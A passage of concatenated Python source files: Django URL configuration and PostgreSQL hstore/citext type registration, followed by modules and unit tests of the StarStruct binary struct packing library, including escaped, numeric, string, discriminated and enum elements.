return (urlconf_module, app_name, namespace)
|
maenette/django | django/conf/urls/__init__.py | <reponame>maenette/django<gh_stars>1-10
from django.urls import RegexURLPattern, RegexURLResolver, include
from django.views import defaults
__all__ = ['handler400', 'handler403', 'handler404', 'handler500', 'include', 'url']
handler400 = defaults.bad_request
handler403 = defaults.permission_denied
handler404 = defaults.page_not_found
handler500 = defaults.server_error
def url(regex, view, kwargs=None, name=None):
if isinstance(view, (list, tuple)):
# For include(...) processing.
urlconf_module, app_name, namespace = view
return RegexURLResolver(regex, urlconf_module, kwargs, app_name=app_name, namespace=namespace)
elif callable(view):
return RegexURLPattern(regex, view, kwargs, name)
else:
raise TypeError('view must be a callable or a list/tuple in the case of include().')
|
maenette/django | django/contrib/postgres/signals.py | import functools
import psycopg2
from psycopg2 import ProgrammingError
from psycopg2.extras import register_hstore
from django.db import connections
@functools.lru_cache()
def get_hstore_oids(connection_alias):
"""Return hstore and hstore array OIDs."""
with connections[connection_alias].cursor() as cursor:
cursor.execute(
"SELECT t.oid, typarray "
"FROM pg_type t "
"JOIN pg_namespace ns ON typnamespace = ns.oid "
"WHERE typname = 'hstore'"
)
oids = []
array_oids = []
for row in cursor:
oids.append(row[0])
array_oids.append(row[1])
return tuple(oids), tuple(array_oids)
@functools.lru_cache()
def get_citext_oids(connection_alias):
"""Return citext array OIDs."""
with connections[connection_alias].cursor() as cursor:
cursor.execute("SELECT typarray FROM pg_type WHERE typname = 'citext'")
return tuple(row[0] for row in cursor)
def register_type_handlers(connection, **kwargs):
if connection.vendor != 'postgresql':
return
try:
oids, array_oids = get_hstore_oids(connection.alias)
register_hstore(connection.connection, globally=True, oid=oids, array_oid=array_oids)
except ProgrammingError:
# Hstore is not available on the database.
#
# If someone tries to create an hstore field it will error there.
# This is necessary as someone may be using PSQL without extensions
# installed but be using other features of contrib.postgres.
#
# This is also needed in order to create the connection in order to
# install the hstore extension.
pass
try:
citext_oids = get_citext_oids(connection.alias)
array_type = psycopg2.extensions.new_array_type(citext_oids, 'citext[]', psycopg2.STRING)
psycopg2.extensions.register_type(array_type, None)
except ProgrammingError:
# citext is not available on the database.
#
# The same comments in the except block of the above call to
# register_hstore() also apply here.
pass
|
sprout42/StarStruct | starstruct/elementescaped.py | <reponame>sprout42/StarStruct<filename>starstruct/elementescaped.py
"""
The escaped NamedStruct element class.
Can be used in multiple ways ways:
1: Variable Lengths, in terms of namedstruct elements
.. code-block:: python
ExampleMessage = Message('VarTest', [('x', 'B'), ('y', 'B')])
TestStruct = Message('TestStruct', [
('escaped_data', ExampleMessage, {
'escape': {
'start': b'\xff\x00\xff\x11',
'separator': b'\x12\x34',
'end': b'\x11\xff\x00\xff',
},
}),
])
`start` is the starting escape sequence
`separator` is a separating sequence
`end` is the ending escape sequence
"""
# pylint: disable=line-too-long
from typing import Optional
import starstruct
from starstruct.element import register, Element
from starstruct.modes import Mode
class Escapor:
def __init__(self, start=None, separator=None, end=None, opts=None):
self._start = start
self._separator = separator
self._end = end
self._opts = opts
@property
def start(self):
if self._start is not None:
return self._start
else:
return b''
@property
def separator(self):
if self._separator is not None:
return self._separator
else:
return b''
@property
def end(self):
if self._end is not None:
return self._end
else:
return b''
@register
class ElementEscaped(Element):
"""
Initialize a StarStruct element object.
:param field: The fields passed into the constructor of the element
:param mode: The mode in which to pack the bytes
:param alignment: Number of bytes to align to
"""
def __init__(self, field: list, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
# All of the type checks have already been performed by the class
# factory
self.name = field[0]
# Escaped elements don't use the normal struct format, the format is
# a StarStruct.Message object, but change the mode to match the
# current mode.
self.format = field[1]
self.escapor = Escapor(**field[2]['escape'])
self._mode = mode
self._alignment = alignment
self.update(mode, alignment)
@staticmethod
def valid(field: tuple) -> bool:
"""
See :py:func:`starstruct.element.Element.valid`
:param field: The items to determine the structure of the element
"""
if len(field) == 3:
return isinstance(field[1], starstruct.message.Message) \
and isinstance(field[2], dict) \
and 'escape' in field[2].keys()
else:
return False
def validate(self, msg):
"""
Ensure that the supplied message contains the required information for
this element object to operate.
All elements that are Variable must reference valid Length elements.
"""
# TODO: Any validation needed here?
pass
def update(self, mode=None, alignment=None):
"""change the mode of the struct format"""
if self._mode is not None:
self._mode = mode
if self._alignment is not None:
self._alignment = alignment
self.format.update(self._mode, self._alignment)
def pack(self, msg):
"""Pack the provided values into the supplied buffer."""
# When packing use the length of the current element to determine
# how many elements to pack, not the length element of the message
# (which should not be specified manually).
iterator = msg[self.name]
if not isinstance(iterator, list):
iterator = [iterator]
ret = self.escapor.start
for item in iterator:
ret += self.format.pack(item)
ret += self.escapor.separator
ret += self.escapor.end
# There is no need to make sure that the packed data is properly
# aligned, because that should already be done by the individual
# messages that have been packed.
return ret
def unpack(self, msg, buf):
"""Unpack data from the supplied buffer using the initialized format."""
# When unpacking a variable element, reference the already unpacked
# length field to determine how many elements need unpacked.
ret = []
# Check the starting value
if buf[:len(self.escapor.start)] == self.escapor.start:
buf = buf[len(self.escapor.start):]
else:
raise ValueError('Buf did not start with expected start sequence: {0}'.format(
self.escapor.start.decode()))
unused = buf
while True:
(val, unused) = self.format.unpack_partial(unused)
ret.append(val)
if unused[:len(self.escapor.separator)] == self.escapor.separator:
unused = unused[len(self.escapor.separator):]
else:
raise ValueError('Buf did not separate with expected separate sequence: {0}'.format(
self.escapor.separator.decode()))
if unused[:len(self.escapor.end)] == self.escapor.end:
unused = unused[len(self.escapor.end):]
break
# There is no need to make sure that the unpacked data consumes a
# properly aligned number of bytes because that should already be done
# by the individual messages that have been unpacked.
return (ret, unused)
def make(self, msg):
"""Return the expected "made" value"""
ret = []
for val in msg[self.name]:
ret.append(self.format.make(val))
return ret
|
sprout42/StarStruct | starstruct/tests/__init__.py | """Tests for the `starstruct` package."""
|
sprout42/StarStruct | starstruct/tests/test_message.py | #!/usr/bin/env python3
"""Tests for the starstruct class"""
import enum
import unittest
import pytest
from starstruct.message import Message
from starstruct.modes import Mode
class SimpleEnum(enum.Enum):
"""Simple enum class for testing message pack/unpack"""
one = 1
two = 2
three = 3
# pylint: disable=line-too-long,invalid-name
class TestStarStruct(unittest.TestCase):
"""StarStruct module tests"""
teststruct = [
('a', 'b'), # signed byte: -128, 127
('pad1', '3x'), # 3 pad bytes
('b', 'H'), # unsigned short: 0, 65535
('pad2', 'x'), # 1 pad byte
('c', '10s'), # 10 byte string
('d', 'x'), # 1 pad byte
('e', '2H'), # 4 unsigned bytes: 0, 2^32-1
('type', 'B', SimpleEnum), # unsigned byte, enum validated
('length', 'H', 'vardata'), # unsigned short length field
('vardata', # variable length data
Message('VarTest', [('x', 'B'), ('y', 'B')]),
'length'),
('data', { # discriminated data
SimpleEnum.one: Message('Struct1', [('y', 'B'), ('pad', '3x'), ('z', 'i')]),
SimpleEnum.two: Message('Struct2', [('z', '20s')]),
SimpleEnum.three: Message('Struct3', []),
}, 'type'),
]
testvalues = [
{
'a': -128,
'b': 0,
'c': '0123456789',
'e': 0,
'type': SimpleEnum.one,
'length': 0,
'vardata': [],
'data': {
'y': 50,
'z': 0x5577AACC,
},
},
{
'a': 127,
'b': 65535,
'c': 'abcdefghij',
'e': 0xFFFFFFFF,
'type': SimpleEnum.two,
'length': 2,
'vardata': [
{'x': 1, 'y': 2},
{'x': 3, 'y': 4},
],
'data': {
'z': '0123456789abcdefghij',
},
},
{
'a': -1,
'b': 32767,
'c': '\n\tzyx',
'e': 0x7FFFFFFF,
'type': SimpleEnum.three,
'length': 1,
'vardata': [
{'x': 255, 'y': 127},
],
'data': {},
},
{
'a': 100,
'b': 100,
'c': 'a0b1c2d3e4',
'e': 10000,
'type': SimpleEnum.one,
'length': 10,
'vardata': [
{'x': 255, 'y': 127},
{'x': 254, 'y': 128},
{'x': 253, 'y': 129},
{'x': 252, 'y': 130},
{'x': 251, 'y': 131},
{'x': 250, 'y': 132},
{'x': 249, 'y': 133},
{'x': 248, 'y': 134},
{'x': 247, 'y': 135},
{'x': 246, 'y': 136},
],
'data': {
'y': 100,
'z': 2000,
},
},
]
testbytes = {
'little': [
b'\x80\x00\x00\x00\x00\x00\x00\x30\x31' +
b'\x32\x33\x34\x35\x36\x37\x38\x39\x00' +
b'\x00\x00\x00\x00\x01\x00\x00\x32\x00\x00\x00\xCC\xAA\x77\x55',
b'\x7F\x00\x00\x00\xFF\xFF\x00\x61\x62' +
b'\x63\x64\x65\x66\x67\x68\x69\x6A\x00' +
b'\xFF\xFF\xFF\xFF\x02\x02\x00\x01\x02' +
b'\x03\x04\x30\x31\x32\x33\x34\x35\x36' +
b'\x37\x38\x39\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a',
b'\xFF\x00\x00\x00\xFF\x7F\x00\x0A\x09' +
b'\x7A\x79\x78\x00\x00\x00\x00\x00\x00' +
b'\xFF\xFF\xFF\x7F\x03\x01\x00\xFF\x7F',
b'\x64\x00\x00\x00\x64\x00\x00\x61\x30' +
b'\x62\x31\x63\x32\x64\x33\x65\x34\x00' +
b'\x10\x27\x00\x00\x01\x0A\x00\xFF\x7F' +
b'\xFE\x80\xFD\x81\xFC\x82\xFB\x83\xFA' +
b'\x84\xF9\x85\xF8\x86\xF7\x87\xF6\x88' +
b'\x64\x00\x00\x00\xD0\x07\x00\x00',
],
'big': [
b'\x80\x00\x00\x00\x00\x00\x00\x30\x31' +
b'\x32\x33\x34\x35\x36\x37\x38\x39\x00' +
b'\x00\x00\x00\x00\x01\x00\x00\x32\x00' +
b'\x00\x00\x55\x77\xAA\xCC',
b'\x7F\x00\x00\x00\xFF\xFF\x00\x61\x62' +
b'\x63\x64\x65\x66\x67\x68\x69\x6A\x00' +
b'\xFF\xFF\xFF\xFF\x02\x00\x02\x01\x02' +
b'\x03\x04\x30\x31\x32\x33\x34\x35\x36' +
b'\x37\x38\x39\x61\x62\x63\x64\x65\x66' +
b'\x67\x68\x69\x6a',
b'\xFF\x00\x00\x00\x7F\xFF\x00\x0A\x09' +
b'\x7A\x79\x78\x00\x00\x00\x00\x00\x00' +
b'\x7F\xFF\xFF\xFF\x03\x00\x01\xFF\x7F',
b'\x64\x00\x00\x00\x00\x64\x00\x61\x30' +
b'\x62\x31\x63\x32\x64\x33\x65\x34\x00' +
b'\x00\x00\x27\x10\x01\x00\x0A\xFF\x7F' +
b'\xFE\x80\xFD\x81\xFC\x82\xFB\x83\xFA' +
b'\x84\xF9\x85\xF8\x86\xF7\x87\xF6\x88' +
b'\x64\x00\x00\x00\x00\x00\x07\xD0',
],
}
def test_init_invalid_name(self):
"""Test invalid Message names."""
for name in [None, '', 1, dict(), list()]:
with self.subTest(name): # pylint: disable=no-member
with self.assertRaises(TypeError) as cm:
Message(name, self.teststruct)
self.assertEqual(str(cm.exception), 'invalid name: {}'.format(name))
def test_init_invalid_mode(self):
"""Test invalid Message modes."""
for mode in ['=', 'stuff', 0, -1, 1]:
with self.subTest(mode): # pylint: disable=no-member
with self.assertRaises(TypeError) as cm:
Message('test', self.teststruct, mode)
self.assertEqual(str(cm.exception), 'invalid mode: {}'.format(mode))
def test_init_empty_struct(self):
"""Test an empty Message."""
val = Message('test', [])
self.assertEqual(val._tuple._fields, ()) # pylint: disable=protected-access
def test_pack_little_endian(self):
"""Test pack the test formats."""
test_msg = Message('test', self.teststruct, Mode.Little)
for idx in range(len(self.testvalues)):
with self.subTest(idx): # pylint: disable=no-member
packed_msg = test_msg.pack(**self.testvalues[idx])
self.assertEqual(self.testbytes['little'][idx], packed_msg)
def test_unpack_little_endian(self):
"""Test unpack the test formats."""
test_msg = Message('test', self.teststruct, Mode.Little)
assert test_msg.mode.to_byteorder() == 'little'
for idx in range(len(self.testvalues)):
with self.subTest(idx): # pylint: disable=no-member
(unpacked_partial_msg, unused) = test_msg.unpack_partial(self.testbytes['little'][idx] + b'\xde\xad')
self.assertEqual(unused, b'\xde\xad')
unpacked_msg = test_msg.unpack(self.testbytes['little'][idx])
expected_tuple = test_msg.make(**self.testvalues[idx]) # pylint: disable=protected-access
self.assertEqual(unpacked_msg, unpacked_partial_msg)
self.assertEqual(unpacked_msg, expected_tuple)
def test_pack_big_endian(self):
"""Test pack the test formats."""
test_msg = Message('test', self.teststruct, Mode.Big)
for idx in range(len(self.testvalues)):
with self.subTest(idx): # pylint: disable=no-member
packed_msg = test_msg.pack(**self.testvalues[idx])
self.assertEqual(self.testbytes['big'][idx], packed_msg)
def test_unpack_big_endian(self):
"""Test unpack the test formats."""
test_msg = Message('test', self.teststruct, Mode.Big)
assert test_msg.mode.to_byteorder() == 'big'
for idx in range(len(self.testvalues)):
with self.subTest(idx): # pylint: disable=no-member
(unpacked_partial_msg, unused) = test_msg.unpack_partial(self.testbytes['big'][idx] + b'\xde\xad')
self.assertEqual(unused, b'\xde\xad')
unpacked_msg = test_msg.unpack(self.testbytes['big'][idx])
expected_tuple = test_msg.make(**self.testvalues[idx]) # pylint: disable=protected-access
self.assertEqual(unpacked_msg, unpacked_partial_msg)
self.assertEqual(unpacked_msg, expected_tuple)
def test_bad_names(self):
with pytest.raises(ValueError) as e:
test_msg = Message('test', [
('pack', 'H'),
('_elements', 'H'),
('_fields', 'H'),
])
print(test_msg)
assert 'pack' in str(e)
assert '_elements' in str(e)
assert '_fields' in str(e)
|
sprout42/StarStruct | starstruct/tests/test_elementenum.py | #!/usr/bin/env python3
"""Tests for the elementenum class"""
import unittest
import enum
from starstruct.elementenum import ElementEnum
class SimpleEnum(enum.Enum):
"""Simple enum class for testing message pack/unpack"""
zero = 0
one = 1
two = 2
# pylint: disable=blacklisted-name
class StrEnum(enum.Enum):
"""string based enum class for testing message pack/unpack"""
foo = 'foo'
bar = 'bar'
# pylint: disable=line-too-long,invalid-name,no-self-use
class TestElementEnum(unittest.TestCase):
"""ElementEnum module tests"""
def test_valid(self):
"""Test field formats that are valid ElementEnum elements."""
test_fields = [
('a', 'b', SimpleEnum), # signed byte: -128, 127
('b', 'H', SimpleEnum), # unsigned short: 0, 65535
('d', 'L', SimpleEnum), # unsigned long: 0, 2^32-1
('e', '?', SimpleEnum), # bool: 0, 1
('d', '10s', StrEnum), # 10 byte string
]
for field in test_fields:
with self.subTest(field): # pylint: disable=no-member
out = ElementEnum.valid(field)
self.assertTrue(out)
def test_not_valid(self):
"""Test field formats that are not valid ElementEnum elements."""
test_fields = [
('a', '4x', SimpleEnum), # 4 pad bytes
('b', 'z', SimpleEnum), # invalid
('c', '1', SimpleEnum), # invalid
('e', '9S', SimpleEnum), # invalid (must be lowercase)
('d', '/', SimpleEnum), # invalid
('f', 'H'), # unsigned short (no class)
]
for field in test_fields:
with self.subTest(field): # pylint: disable=no-member
out = ElementEnum.valid(field)
self.assertFalse(out)
def test_valid_pack(self):
"""Test packing valid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
({'a': 0}, b'\x00'),
({'a': 2}, b'\x02'),
({'a': SimpleEnum.one}, b'\x01'),
({'a': SimpleEnum.two}, b'\x02'),
({'a': 'two'}, b'\x02'),
]
for (in_val, out_val) in test_values:
with self.subTest((out_val, in_val)): # pylint: disable=no-member
ret = elem.pack(in_val)
self.assertEqual(ret, out_val)
def test_invalid_pack(self):
"""Test packing invalid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
{'a': -1},
{'a': 3},
{'a': 'three'},
{'a': 'ONE'},
]
msg = '{} is not a valid {}'
for val in test_values:
with self.subTest(val): # pylint: disable=no-member
with self.assertRaises(ValueError) as cm:
elem.pack(val)
self.assertEqual(str(cm.exception), msg.format(val['a'], 'SimpleEnum'))
def test_valid_unpack(self):
"""Test unpacking valid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
(SimpleEnum.zero, b'\x00'),
(SimpleEnum.one, b'\x01'),
(SimpleEnum.two, b'\x02'),
]
for (out_val, in_val) in test_values:
with self.subTest((out_val, in_val)): # pylint: disable=no-member
(ret, unused) = elem.unpack({}, in_val)
self.assertEqual(unused, b'')
self.assertEqual(ret, out_val)
def test_invalid_unpack(self):
"""Test unpacking invalid enum values."""
field = ('a', 'b', SimpleEnum) # signed byte: -128, 127
out = ElementEnum.valid(field)
self.assertTrue(out)
elem = ElementEnum(field)
test_values = [
(b'\xFF', -1),
(b'\x03', 3),
(b'\x7F', 127),
(b'\x10', 16),
(b'\x80', -128),
]
# msg = '{} is not a valid {}'
for (in_val, out_val) in test_values:
with self.subTest((in_val, out_val)): # pylint: disable=no-member
# with self.assertRaises(ValueError) as cm:
with self.assertRaises(ValueError):
elem.unpack({}, in_val)
# self.assertEqual(str(cm.exception), msg.format(out_val, 'SimpleEnum'))
|
sprout42/StarStruct | starstruct/tests/test_elementnum.py | <gh_stars>1-10
#!/usr/bin/env python3
"""Tests for the elementbase class"""
import unittest
from starstruct.elementnum import ElementNum
# pylint: disable=line-too-long,invalid-name
class TestElementNum(unittest.TestCase):
"""ElementNum module tests"""
def test_valid(self):
"""Test field formats that are valid ElementNum elements."""
test_fields = [
('a', '3b'), # 3 byte number: 0, 2^24-1
('b', 'H'), # unsigned short: 0, 65535
('c', '4Q'), # 32 signed byte number: (super big number)
('d', 'l'), # signed long: -2^31, 2^31-1
]
for field in test_fields:
with self.subTest(field): # pylint: disable=no-member
out = ElementNum.valid(field)
self.assertTrue(out)
def test_not_valid(self):
"""Test field formats that are not valid ElementNum elements."""
test_fields = [
('a', '4x'), # 4 pad bytes
('b', 'z'), # invalid
('c', '1'), # invalid
('d', '9S'), # invalid (must be lowercase)
('e', '/'), # invalid
('f', '?'), # invalid
]
for field in test_fields:
with self.subTest(field): # pylint: disable=no-member
out = ElementNum.valid(field)
self.assertFalse(out)
|
sprout42/StarStruct | starstruct/elementnum.py | <filename>starstruct/elementnum.py
"""StarStruct element class."""
import struct
import re
import enum
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementNum(Element):
"""
A StarStruct element class for number fields.
"""
# pylint: disable=too-many-instance-attributes
def __init__(self, field, mode=Mode.Native, alignment=1):
"""Initialize a StarStruct element object."""
# All of the type checks have already been performed by the class
# factory
self.name = field[0]
# The ref attribute is required for all elements, but the base element
# type does not have one
self.ref = None
self._mode = mode
self._alignment = alignment
# Validate that the format specifiers are valid struct formats, this
# doesn't have to be done now because the format will be checked when
# any struct functions are called, but it's better to inform the user of
# any errors earlier.
# The easiest way to perform this check is to create a "Struct" class
# instance, this will also increase the efficiency of all struct related
# functions called.
self.format = mode.value + field[1]
self._struct = struct.Struct(self.format)
# for numeric elements we should also keep track of how many numeric
# fields and what the size of those fields are required to create this
# element.
self._bytes = struct.calcsize(self.format[-1])
self._signed = self.format[-1] in 'bhilq'
@staticmethod
def valid(field):
"""
Validation function to determine if a field tuple represents a valid
base element type.
The basics have already been validated by the Element factory class,
validate the specific struct format now.
"""
return len(field) == 2 \
and isinstance(field[1], str) \
and re.match(r'\d*[bBhHiIlLqQ]', field[1])
def validate(self, msg):
"""
Ensure that the supplied message contains the required information for
this element object to operate.
The "number" element requires no further validation.
"""
pass
def update(self, mode=None, alignment=None):
"""change the mode of the struct format"""
if alignment:
self._alignment = alignment
if mode:
self._mode = mode
self.format = mode.value + self.format[1:]
# recreate the struct with the new format
self._struct = struct.Struct(self.format)
def pack(self, msg):
"""Pack the provided values into the supplied buffer."""
# Take a single numeric value and convert it into the necessary list
# of values required by the specified format.
val = msg[self.name]
# This should be a number, but handle cases where it's an enum
if isinstance(val, enum.Enum):
val = val.value
# If the value supplied is not already a bytes object, convert it now.
if isinstance(val, (bytes, bytearray)):
val_list = val
else:
val_list = val.to_bytes(struct.calcsize(self.format),
byteorder=self._mode.to_byteorder(),
signed=self._signed)
# join the byte list into the expected number of values to pack the
# specified struct format.
val = [int.from_bytes(val_list[i:i + self._bytes], # pylint: disable=no-member
byteorder=self._mode.to_byteorder(),
signed=self._signed)
for i in range(0, len(val_list), self._bytes)]
data = self._struct.pack(*val)
# If the data does not meet the alignment, add some padding
missing_bytes = len(data) % self._alignment
if missing_bytes:
data += b'\x00' * missing_bytes
return data
def unpack(self, msg, buf):
"""Unpack data from the supplied buffer using the initialized format."""
ret = self._struct.unpack_from(buf, 0)
# Remember to remove any alignment-based padding
extra_bytes = self._alignment - 1 - (struct.calcsize(self.format) %
self._alignment)
unused = buf[struct.calcsize(self.format) + extra_bytes:]
# merge the unpacked data into a byte array
data = [v.to_bytes(self._bytes, byteorder=self._mode.to_byteorder(),
signed=self._signed) for v in ret]
# Join the returned list of numbers into a single value
val = int.from_bytes(b''.join(data), # pylint: disable=no-member
byteorder=self._mode.to_byteorder(),
signed=self._signed)
return (val, unused)
def make(self, msg):
"""Return the expected "made" value"""
val = msg[self.name]
# This should be a number, but handle cases where it's an enum
if isinstance(val, enum.Enum):
val = val.value
elif isinstance(val, list):
# It's unlikely but possible that this could be a list of numbers,
# or a list of bytes
if all(isinstance(v, bytes) for v in val):
# To turn this into a single number, merge the bytes, later the
# bytes will be converted into a single number.
data = b''.join(val)
elif all(isinstance(v, int) for v in val):
# To turn this into a single number, convert the numbers into
# bytes, and merge the bytes, later the bytes will be converted
# into a single number.
data = [v.to_bytes(self._bytes,
byteorder=self._mode.to_byteorder(),
signed=self._signed) for v in val]
else:
error = 'Invalid value for numerical element: {}'
raise TypeError(error.format(val))
elif isinstance(val, bytes):
# If the value supplied is a bytes object, convert it to a number
data = val
elif isinstance(val, int):
return val
else:
error = 'Invalid value for numerical element: {}'
raise TypeError(error.format(val))
return int.from_bytes(data, # pylint: disable=no-member
byteorder=self._mode.to_byteorder(),
signed=self._signed)
|
sprout42/StarStruct | starstruct/elementstring.py | <reponame>sprout42/StarStruct<gh_stars>1-10
"""StarStruct element class."""
import struct
import re
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementString(Element):
"""
A StarStruct element for strings, because standard string treatment of
pack/unpack can be inconvenient.
This element will encode and decode string type elements from and to forms
that are easier to use and manage.
"""
def __init__(self, field, mode=Mode.Native, alignment=1):
"""Initialize a StarStruct element object."""
# All of the type checks have already been performed by the class
# factory
self.name = field[0]
# The ref attribute is required for all elements, but base element
# types don't have one
self.ref = None
self._mode = mode
self._alignment = alignment
# Validate that the format specifiers are valid struct formats, this
# doesn't have to be done now because the format will be checked when
# any struct functions are called, but it's better to inform the user of
# any errors earlier.
# The easiest way to perform this check is to create a "Struct" class
# instance, this will also increase the efficiency of all struct related
# functions called.
self.format = mode.value + field[1]
self._struct = struct.Struct(self.format)
@staticmethod
def valid(field):
"""
Validation function to determine if a field tuple represents a valid
string element type.
"""
return len(field) == 2 \
and isinstance(field[1], str) \
and re.match(r'\d*[csp]', field[1])
def validate(self, msg):
"""
Ensure that the supplied message contains the required information for
this element object to operate.
The "string" element requires no further validation.
"""
pass
def update(self, mode=None, alignment=None):
"""change the mode of the struct format"""
if alignment:
self._alignment = alignment
if mode:
self._mode = mode
self.format = mode.value + self.format[1:]
# recreate the struct with the new format
self._struct = struct.Struct(self.format)
def pack(self, msg):
"""Pack the provided values into the supplied buffer."""
# Ensure that the input is of the proper form to be packed
val = msg[self.name]
size = struct.calcsize(self.format)
assert len(val) <= size
if self.format[-1] in ('s', 'p'):
if not isinstance(val, bytes):
assert isinstance(val, str)
val = val.encode()
if self.format[-1] == 'p' and len(val) < size:
# 'p' (pascal strings) must be the exact size of the format
val += b'\x00' * (size - len(val))
data = self._struct.pack(val)
else: # 'c'
if not all(isinstance(c, bytes) for c in val):
if isinstance(val, bytes):
val = [bytes([c]) for c in val]
else:
# last option, it could be a string, or a list of strings
assert (isinstance(val, list) and
all(isinstance(c, str) for c in val)) or \
isinstance(val, str)
val = [c.encode() for c in val]
if len(val) < size:
val.extend([b'\x00'] * (size - len(val)))
data = self._struct.pack(*val)
# If the data does not meet the alignment, add some padding
missing_bytes = len(data) % self._alignment
if missing_bytes:
data += b'\x00' * (self._alignment - missing_bytes)
return data
def unpack(self, msg, buf):
"""Unpack data from the supplied buffer using the initialized format."""
ret = self._struct.unpack_from(buf, 0)
# Remember to remove any alignment-based padding
extra_bytes = self._alignment - 1 - (struct.calcsize(self.format) %
self._alignment)
unused = buf[struct.calcsize(self.format) + extra_bytes:]
if self.format[-1] in 's':
# for 's' formats, convert to a string and strip padding
val = ret[0].decode().strip('\x00')
elif self.format[-1] in 'p':
# for 'p' formats, convert to a string, but leave the padding
val = ret[0].decode()
else: # 'c'
# Just in case we have some ints in the message
val = [c.decode() if not isinstance(c, int)
else chr(c)
for c in ret]
return (val, unused)
def make(self, msg):
"""Return a string of the expected format"""
val = msg[self.name]
size = struct.calcsize(self.format)
assert len(val) <= size
# If the supplied value is a list of chars, or a list of bytes, turn
# it into a string for ease of processing.
if isinstance(val, list):
if all(isinstance(c, bytes) for c in val):
val = ''.join([c.decode() for c in val])
elif all(isinstance(c, str) for c in val):
val = ''.join([c for c in val])
else:
error = 'Invalid value for string element: {}'
raise TypeError(error.format(val))
elif isinstance(val, bytes):
# If the supplied value is a byes, decode it into a normal string
val = val.decode()
# 'p' (pascal strings) and 'c' (char list) must be the exact size of
# the format
if self.format[-1] == 'p' and len(val) < size - 1:
val += '\x00' * (size - len(val) - 1)
# Lastly, 'c' (char list) formats are expected to be a list of
# characters rather than a string.
if self.format[-1] == 'c':
val += '\x00' * (size - len(val))
val = [c for c in val]
return val
|
sprout42/StarStruct | starstruct/elementdiscriminated.py | """StarStruct element class."""
import starstruct
from starstruct.element import register, Element
from starstruct.modes import Mode
@register
class ElementDiscriminated(Element):
"""
The discriminated StarStruct element class.
"""
def __init__(self, field, mode=Mode.Native, alignment=1):
"""Initialize a StarStruct element object."""
# All of the type checks have already been performed by the class
# factory
self.name = field[0]
self.ref = field[2]
# Discriminated elements don't use the normal struct format, the format
# is the supplied dictionary where the key is a value of the referenced
# enum element, and the value for each entry is a StarStruct.Message
# object.
self.format = field[1]
# but change the mode to match the current mode.
self.update(mode, alignment)
@staticmethod
def valid(field):
"""
Validation function to determine if a field tuple represents a valid
enum element type.
The basics have already been validated by the Element factory class,
validate that the struct format is a valid numeric value.
"""
return len(field) == 3 \
and isinstance(field[1], dict) \
and isinstance(field[2], str) \
and all(isinstance(val, (starstruct.message.Message, type(None)))
for val in field[1].values())
def validate(self, msg):
"""
Ensure that the supplied message contains the required information for
this element object to operate.
All Discriminated elements must reference valid Enum elements, and the
keys of the discriminated format must be valid instances of the
referenced Enum class.
"""
from starstruct.elementenum import ElementEnum
if not isinstance(msg[self.ref], ElementEnum):
err = 'discriminated field {} reference {} invalid type'
raise TypeError(err.format(self.name, self.ref))
elif not all(isinstance(key, msg[self.ref].ref)
for key in self.format.keys()):
err = 'discriminated field {} reference {} mismatch'
raise TypeError(err.format(self.name, self.ref))
else:
for key in self.format.keys():
try:
ref_cls = msg[self.ref].ref
assert ref_cls(key)
except:
err = 'discriminated field {} key {} not a valid {}'
msg = err.format(self.name, key, self.ref)
raise TypeError(msg)
def update(self, mode=None, alignment=None):
"""change the mode of each message format"""
self._mode = mode
self._alignment = alignment
for key in self.format.keys():
if self.format[key] is not None:
self.format[key].update(mode, alignment)
def pack(self, msg):
"""Pack the provided values into the supplied buffer."""
# When packing use the value of the referenced element to determine
# which field format to use to pack this element. Be sure to check if
# the referenced format is None or a Message object.
if msg[self.ref] not in self.format:
msg = 'invalid value {} for element {}:{}'.format(
msg[self.ref], self.name, self.format.keys())
raise ValueError(msg)
if self.format[msg[self.ref]] is not None:
if msg[self.name] is not None:
data = self.format[msg[self.ref]].pack(dict(msg[self.name]))
else:
data = self.format[msg[self.ref]].pack({})
else:
data = b''
# There is no need to make sure that the packed data is properly
# aligned, because that should already be done by the individual
# messages that have been packed.
return data
def unpack(self, msg, buf):
"""Unpack data from the supplied buffer using the initialized format."""
# When unpacking a discriminated element, reference the already unpacked
# enum field to determine how many elements need unpacked. If the
# specific value is None rather than a Message object, return no new
# parsed data.
#
# There is no need to make sure that the unpacked data consumes a
# properly aligned number of bytes because that should already be done
# by the message that is unpacked.
#
# Use the getattr() function since the referenced value is an enum
if self.format[getattr(msg, self.ref)] is not None:
return self.format[getattr(msg, self.ref)].unpack_partial(buf)
else:
return (None, buf)
def make(self, msg):
"""Return the expected "made" value"""
if hasattr(msg, self.ref):
key = getattr(msg, self.ref)
else:
# Assume it's a dictionary, not a tuple
key = msg[self.ref]
if self.format[key] is not None:
return self.format[key].make(msg[self.name])
else:
return None
|
sprout42/StarStruct | starstruct/modes.py | <gh_stars>1-10
"""binary representation modes used for a StarStruct object."""
import sys
import enum
@enum.unique
class Mode(enum.Enum):
"""The StarStruct modes match the modes supported by struct.pack/unpack."""
Native = '='
Little = '<'
Big = '>'
Network = '!'
def to_byteorder(self):
"""
Convert a Mode to a byteorder string such as required by the
to_bytes() or from_bytes() functions.
"""
if self == Mode.Native:
return sys.byteorder
elif self == Mode.Little:
return 'little'
else: # Big or Network
return 'big'
@staticmethod
def from_byteorder(val):
"""
Convert a byteorder string such as used by the to_bytes() or
from_bytes() functions into a Mode value.
"""
if val == 'little':
return Mode.Little
elif val == 'big':
return Mode.Big
elif val == 'native': # custom
return Mode.Native
elif val == 'network': # custom
return Mode.Network
raise TypeError('{} not a valid byteorder'.format(val))
|
sprout42/StarStruct | starstruct/tests/test_elementconstant.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the constant class"""
import unittest
from starstruct.message import Message
from starstruct.modes import Mode
class TestElementConstant(unittest.TestCase):
def test_one_element(self):
TestStruct = Message('TestStruct', [
('regular', 'B'), # Two regular messages
('fill_in_later', 'H'),
